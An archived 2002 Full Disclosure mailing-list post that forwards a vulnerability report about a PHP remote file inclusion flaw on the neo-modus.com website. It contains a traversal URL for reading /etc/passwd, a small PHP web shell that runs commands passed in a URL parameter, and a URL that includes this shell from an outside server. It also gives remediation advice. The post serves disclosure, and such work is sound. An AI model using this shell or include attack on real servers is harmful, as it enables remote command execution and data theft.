Full Disclosure mailing list archives
PHP execution vulnerability on www.neo-modus.com (direct connect homepage)
From: burpz () gmx net (burpz () gmx net)
Date: Wed, 2 Oct 2002 08:01:26 +0200 (MEST)
neo-modus.com is the home of the quite popular file sharing utility 'direct connect', unfortunately their website is vulnerable to a common php include() vulnerability. Message below was send 2 weeks ago to the 'bugs' email address listed on their website. I didn't get any response. --- Forwarded Message ---Dear Reader, I recently stumbled across your website www.neo-modus.com, I fiddled around a bit with the .php scripts, and found that they are vulnerable to averycommon php error. The index.php script takes a parameter 'page', so it knows what page to show. It then passes the value of this parameter DIRECTLY into ainclude()statement. This is very, very bad. Let's say I go to the url: http://www.neo-modus.com/?page=/etc/passwd - this tries to open /etc/passwd.html - so i can break out of the document root and view every file with an .html (or .php?) extension. This seems not too bad, but there's more. PHP has a feature called "furl_open", which allows include() to take an URL as a parameter to include it in it's page. So we create a text file on a different webserver (whichdoesntparse .txt files) called test.txt, which contains: <?php printf("<div align=\"left\"><pre>"); printf("%s", nl2br(system($HTTP_GET_VARS['cmd']))); printf("</pre></div>"); ?> we then go to the url http://www.neo-modus.com/?page=http://my.webpage.com/test.txt&cmd=ls -al and we get a nice "ls -al" output runned on YOUR webserver. We can runallcommands with privileges of the webserver. I think you can understandhowbad this is. To fix these issues, I suggest you disable furl_open in the php configuration file, and filter the "page" parameter passed to index.phpsothat it strips slashes, backslashes, dots and limits it to a specific directory only. Another thing: don't place files which contain password information inthedocument root. ConnectToDatabase.php contains sensitive information. Change your mysql passwords, and limit access to the mysql server from YOUR website host only. I could connect without problems - this should not be thecase.
-- +++ GMX - Mail, Messaging & more http://www.gmx.net +++ NEU: Mit GMX ins Internet. Günstige DSL- & Modem/ISDN-Tarife!
Current thread:
- PHP execution vulnerability on www.neo-modus.com (direct connect homepage) burpz () gmx net (Oct 01)